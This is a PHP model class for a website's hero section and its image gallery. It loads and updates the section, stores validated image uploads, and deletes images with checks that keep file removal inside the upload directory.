Viewing: Hero.php
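<?php

/**
 * Model for the single-row hero section (id = 1) and its image gallery.
 *
 * Relies on members that are not defined in this file: `$this->db` (used here
 * through query()/prepare()/execute()/fetch(), presumably a PDO handle; confirm
 * in BaseModel), `$this->update()`, and the `ROOT_PATH` constant.
 */
class Hero extends BaseModel
{
    protected string $table = 'hero_section';

    protected array $fillable = [
        'subtitle',
        'title_1',
        'title_2',
        'desc_1',
        'desc_2',
        'updated_at',
    ];

    /**
     * Load the hero row together with its images.
     *
     * @return array The hero_section row plus an 'images' key; when the row is
     *               missing the result is ['images' => []].
     */
    public function getData(): array
    {
        $hero = $this->db->query('SELECT * FROM hero_section WHERE id = 1 LIMIT 1')->fetch() ?: [];

        $hero['images'] = $hero
            ? $this->db->query('SELECT id, image_path FROM hero_images WHERE hero_id = 1 ORDER BY id ASC')->fetchAll()
            : [];

        return $hero;
    }

    /**
     * Update the hero row, stamping 'updated_at' with the current time.
     *
     * @param array $data Column => value pairs handed to BaseModel::update().
     */
    public function updateData(array $data): bool
    {
        $data['updated_at'] = date('Y-m-d H:i:s');

        return $this->update(1, $data);
    }

    /**
     * Store every successfully uploaded file of a multi-file upload field.
     *
     * @param array $files One $_FILES entry in its multi-file layout
     *                     (name[], type[], tmp_name[], error[], size[]).
     */
    public function addImages(array $files): void
    {
        $names = $files['name'] ?? [];
        if (!is_array($names)) {
            // A single-file entry has scalar members; count() on it would throw.
            return;
        }

        $insert = null;
        $count = count($names);

        for ($i = 0; $i < $count; $i++) {
            if (($files['error'][$i] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
                continue;
            }

            // Client-supplied members are defaulted so a malformed request
            // cannot raise undefined-index notices; uploadImage() rejects
            // entries with an empty name or tmp_name.
            $file = [
                'name' => $names[$i] ?? '',
                'type' => $files['type'][$i] ?? '',
                'tmp_name' => $files['tmp_name'][$i] ?? '',
                'error' => $files['error'][$i],
                'size' => $files['size'][$i] ?? 0,
            ];

            $path = $this->uploadImage($file);
            if (!$path) {
                continue;
            }

            // Prepared once, on the first stored file, and reused afterwards.
            $insert ??= $this->db->prepare("INSERT INTO hero_images (hero_id, image_path) VALUES (1, ?)");
            $insert->execute([$path]);
        }
    }

    /**
     * Delete one hero image: the database row first, then the file on disk.
     *
     * The row goes first so that a failed DELETE never leaves a record that
     * points at a file which has already been removed.
     *
     * @return bool False when the id is unknown or the DELETE fails.
     */
    public function deleteImage(int $id): bool
    {
        $select = $this->db->prepare("SELECT image_path FROM hero_images WHERE id = ?");
        $select->execute([$id]);
        $image = $select->fetch();

        if (!$image) {
            return false;
        }

        $delete = $this->db->prepare("DELETE FROM hero_images WHERE id = ?");
        $deleted = $delete->execute([$id]);

        if ($deleted) {
            $this->deleteOldFile($image['image_path']);
        }

        return $deleted;
    }

    /**
     * Move one uploaded image into storage/uploads/hero.
     *
     * The stored name is generated server-side and its extension comes from
     * the sniffed MIME type, so neither the client file name nor the client
     * 'type' field influences where or how the file is stored.
     *
     * @param array $file One single-file $_FILES entry.
     * @return string|null Path relative to ROOT_PATH, or null when rejected.
     */
    public function uploadImage(array $file): ?string
    {
        if (empty($file['name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return null;
        }

        // Only sniff files PHP itself received in this request. Without this,
        // a crafted 'tmp_name' would be opened by mime_content_type() before
        // move_uploaded_file() gets the chance to refuse it.
        $tmpName = $file['tmp_name'] ?? '';
        if (!is_string($tmpName) || $tmpName === '' || !is_uploaded_file($tmpName)) {
            return null;
        }

        $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/webp' => 'webp'];

        // NOTE(review): content sniffing reads leading bytes only, so a file can
        // be a valid image and still carry other data. The target directory
        // should be served without script execution; confirm the server config.
        $mime = mime_content_type($tmpName);
        if ($mime === false || !isset($allowed[$mime])) {
            return null;
        }

        $filename = 'hero_' . date('YmdHis') . '_' . bin2hex(random_bytes(4)) . '.' . $allowed[$mime];
        $directory = ROOT_PATH . '/storage/uploads/hero';

        // The second is_dir() covers a concurrent request creating the directory.
        if (!is_dir($directory) && !mkdir($directory, 0775, true) && !is_dir($directory)) {
            return null;
        }

        if (move_uploaded_file($tmpName, $directory . '/' . $filename)) {
            return 'storage/uploads/hero/' . $filename;
        }

        return null;
    }

    /**
     * Check an optional image upload; an entry with no file name counts as valid.
     *
     * The extension denylist is a coarse pre-filter only. The sniffed MIME
     * allowlist is the effective gate, and uploadImage() never reuses the
     * client-supplied extension.
     *
     * @param array $file One single-file $_FILES entry.
     */
    public function validImage(array $file): bool
    {
        if (empty($file['name'])) {
            return true;
        }

        $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
        if (in_array($extension, ['php', 'js', 'html', 'svg'], true)) {
            return false;
        }

        // A named entry without a temp file cannot be inspected; reject it
        // instead of handing an empty path to mime_content_type().
        $tmpName = $file['tmp_name'] ?? '';
        if (!is_string($tmpName) || $tmpName === '') {
            return false;
        }

        return in_array(mime_content_type($tmpName), ['image/jpeg', 'image/png', 'image/webp'], true);
    }

    /**
     * Remove a stored file referenced by a database path.
     *
     * Values starting with 'http' are skipped as remote. The path is resolved
     * with realpath() and deleted only when it lies inside
     * ROOT_PATH/storage/uploads, so a stored value containing '../' or a
     * symlink cannot cause the deletion of a file outside the upload tree.
     */
    private function deleteOldFile(?string $oldFile): void
    {
        if (!$oldFile || str_starts_with($oldFile, 'http')) {
            return;
        }

        $uploadsRoot = realpath(ROOT_PATH . '/storage/uploads');
        $target = realpath(ROOT_PATH . '/' . ltrim($oldFile, '/'));

        if ($uploadsRoot === false || $target === false) {
            return;
        }

        if (!str_starts_with($target, $uploadsRoot . DIRECTORY_SEPARATOR)) {
            return;
        }

        if (is_file($target)) {
            unlink($target);
        }
    }
}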